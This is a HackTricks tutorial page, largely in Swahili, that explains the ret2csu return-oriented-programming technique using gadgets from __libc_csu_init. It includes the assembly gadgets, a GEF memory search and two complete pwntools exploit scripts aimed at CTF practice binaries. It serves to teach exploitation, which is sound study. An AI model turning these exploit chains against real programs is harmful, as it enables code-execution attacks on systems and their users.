Ret2csu

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

https://www.scs.stanford.edu/brop/bittau-brop.pdfBasic Information

ret2csu ni mbinu ya udukuzi inayotumika unapojaribu kuchukua udhibiti wa programu lakini huwezi kupata gadgets unazotumia kawaida kubadilisha tabia ya programu.

Wakati programu inatumia maktaba fulani (kama libc), ina baadhi ya kazi zilizojengwa ndani kwa ajili ya kusimamia jinsi vipande tofauti vya programu vinavyoongea na kila mmoja. Miongoni mwa kazi hizi kuna baadhi ya vito vilivyofichwa ambavyo vinaweza kutenda kama gadgets zetu zinazokosekana, hasa moja inayoitwa __libc_csu_init.

The Magic Gadgets in __libc_csu_init

Katika __libc_csu_init, kuna mfuatano mbili za maagizo (gadgets) za kuangazia:

Mfuatano wa kwanza unaturuhusu kuweka thamani katika register kadhaa (rbx, rbp, r12, r13, r14, r15). Hizi ni kama nafasi ambapo tunaweza kuhifadhi nambari au anwani tunazotaka kutumia baadaye.

pop rbx;
pop rbp;
pop r12;
pop r13;
pop r14;
pop r15;
ret;

Hii gadget inatupa uwezo wa kudhibiti hizi registers kwa kupopoa thamani kutoka kwenye stack ndani yao.

Mfululizo wa pili unatumia thamani tulizoweka kufanya mambo kadhaa:

Hamisha thamani maalum kwenye registers nyingine, na kuziandaa kwa ajili yetu kuzitumia kama vigezo katika kazi.
Fanya wito kwa eneo lililopangwa kwa kujumlisha thamani katika r15 na rbx, kisha kuzidisha rbx kwa 8.

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];

Labda hujui anwani yoyote ya kuandika hapo na unahitaji amri ya ret. Kumbuka kwamba gadget ya pili pia itamalizika kwa ret, lakini utahitaji kukutana na masharti fulani ili kufikia hiyo:

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
add rbx, 0x1;
cmp rbp, rbx
jnz <func>
...
ret

Masharti yatakuwa:

[r12 + rbx*8] lazima iwe inaelekeza kwenye anwani inayohifadhi kazi inayoweza kuitwa (ikiwa huna wazo na hakuna pie, unaweza kutumia tu kazi ya _init):
Ikiwa _init iko kwenye 0x400560, tumia GEF kutafuta kiashiria katika kumbukumbu kwake na ufanye [r12 + rbx*8] kuwa anwani yenye kiashiria cha _init:

# Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
gef➤  search-pattern 0x400560
[+] Searching '\x60\x05\x40' in memory
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"

rbp na rbx lazima wawe na thamani sawa ili kuepuka kuruka
Kuna baadhi ya pops zilizokosekana unahitaji kuzingatia

RDI na RSI

Njia nyingine ya kudhibiti rdi na rsi kutoka kwa gadget ya ret2csu ni kwa kufikia ofseti maalum:

Angalia ukurasa huu kwa maelezo zaidi:

BROP - Blind Return Oriented Programming

Mfano

Kutumia wito

Fikiria unataka kufanya syscall au kuita kazi kama write() lakini unahitaji thamani maalum katika register za rdx na rsi kama vigezo. Kawaida, ungeangalia gadgets ambazo zinaweka register hizi moja kwa moja, lakini huwezi kupata yoyote.

Hapa ndipo ret2csu inapoingia:

Weka Register: Tumia gadget ya kwanza ya kichawi kupop values kutoka kwenye stack na kuingia rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), na r15.
Tumia Gadget ya Pili: Ukiwa na register hizo zimewekwa, unatumia gadget ya pili. Hii inakuwezesha kuhamasisha thamani zako ulizochagua katika rdx na rsi (kutoka r14 na r13, mtawalia), ukitayarisha vigezo kwa wito wa kazi. Zaidi ya hayo, kwa kudhibiti r15 na rbx, unaweza kufanya programu iite kazi iliyoko kwenye anwani unayoihesabu na kuweka katika [r15 + rbx*8].

Una mfano unaotumia mbinu hii na kuielezea hapa, na hii ndiyo exploit ya mwisho iliyotumika:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0)                      # r12
rop.raw(0)                      # r13
rop.raw(0xdeadbeefcafed00d)     # r14 - popped into RDX!
rop.raw(RW_LOC)                 # r15 - holds location of called function!
rop.raw(REG_CALL)               # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
print(p.recvline())                        # should receive "Awesome work!"

Kumbuka kwamba exploit iliyopita haikusudiwi kufanya RCE, inakusudia tu kuita kazi inayoitwa win (ikichukua anwani ya win kutoka stdin inayoita gets katika mnyororo wa ROP na kuihifadhi katika r15) na hoja ya tatu yenye thamani 0xdeadbeefcafed00d.

Kupita simu na kufikia ret

Exploit ifuatayo ilitolewa kutoka kwenye ukurasa huu ambapo ret2csu inatumika lakini badala ya kutumia simu, in akipita kulinganisha na kufikia ret baada ya simu:

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
# This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/

from pwn import *

# Establish the target process
target = process('./ret2csu')
#gdb.attach(target, gdbscript = 'b *    0x4007b0')

# Our two __libc_csu_init rop gadgets
csuGadget0 = p64(0x40089a)
csuGadget1 = p64(0x400880)

# Address of ret2win and _init pointer
ret2win = p64(0x4007b1)
initPtr = p64(0x600e38)

# Padding from start of input to saved return address
payload = "0"*0x28

# Our first gadget, and the values to be popped from the stack

# Also a value of 0xf means it is a filler value
payload += csuGadget0
payload += p64(0x0) # RBX
payload += p64(0x1) # RBP
payload += initPtr # R12, will be called in `CALL qword ptr [R12 + RBX*0x8]`
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xdeadcafebabebeef) # R15 > soon to be RDX

# Our second gadget, and the corresponding stack values
payload += csuGadget1
payload += p64(0xf) # qword value for the ADD RSP, 0x8 adjustment
payload += p64(0xf) # RBX
payload += p64(0xf) # RBP
payload += p64(0xf) # R12
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xf) # R15

# Finally the address of ret2win
payload += ret2win

# Send the payload
target.sendline(payload)
target.interactive()

Kwa Nini Usitumie libc Moja kwa Moja?

Kawaida kesi hizi pia zina udhaifu wa ret2plt + ret2lib, lakini wakati mwingine unahitaji kudhibiti vigezo zaidi kuliko vile ambavyo vinaweza kudhibitiwa kwa urahisi na gadgets unazozipata moja kwa moja katika libc. Kwa mfano, kazi ya write() inahitaji vigezo vitatu, na kupata gadgets za kuweka yote haya moja kwa moja huenda isiwezekane.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousBROP - Blind Return Oriented Programming NextRet2dlresolve

Last updated 5 days ago